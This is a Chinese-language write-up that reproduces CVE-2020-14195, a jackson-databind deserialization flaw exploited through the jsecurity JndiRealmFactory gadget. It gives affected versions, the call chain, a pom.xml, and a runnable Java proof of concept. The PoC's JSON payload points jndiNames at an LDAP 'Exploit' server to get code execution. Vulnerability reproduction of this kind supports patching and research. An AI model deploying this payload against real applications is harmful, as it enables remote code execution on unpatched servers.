(CVE-2020-14195)FasterXML jackson-databind 反序列化漏洞

一、漏洞简介

利用条件开启enableDefaultTyping()使用了org.jsecurity.realm.jndi.JndiRealmFactory第三方依赖

二、漏洞影响

jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7

三、复现过程

漏洞分析

首先定位到org.jsecurity.realm.jndi.JndiRealmFactory类,之后发现一处可疑的JNDI注入:1.png参数name来自i\$,而i$源自jndiNames,此时要想进入lookup需要满足前面的if条件语句,即jndiNames不为空,且不为null,所以我们可以在构造poc时直接对jndiName进行传参赋值操作即可,同时将其设置为我们的ldap恶意服务:2.png整个利用链如下所示:

mapper.readValue
    ->setJndiNames
        ->getRealms
             ->lookup

漏洞复现

pom.xml如下:

<dependencies>
    <dependency>
      <groupId>com.fasterxml.jackson.core</groupId>
      <artifactId>jackson-databind</artifactId>
      <version>2.9.10.4</version>
    </dependency>

      <!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
      <dependency>
          <groupId>org.jsecurity</groupId>
          <artifactId>jsecurity</artifactId>
          <version>0.9.0</version>
      </dependency>

    <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-nop</artifactId>
      <version>1.7.2</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
      <dependency>
          <groupId>javax.transaction</groupId>
          <artifactId>jta</artifactId>
          <version>1.1</version>
      </dependency>
  </dependencies>

漏洞POC:

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\",{\"jndiNames\":\"ldap://127.0.0.1:1099/Exploit\"}]";
        try {
            Object obj = mapper.readValue(payload, Object.class);
            mapper.writeValueAsString(obj);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

之后运行该程序,成功执行命令,弹出计算器:

3.png

参考链接

https://xz.aliyun.com/t/8012#toc-18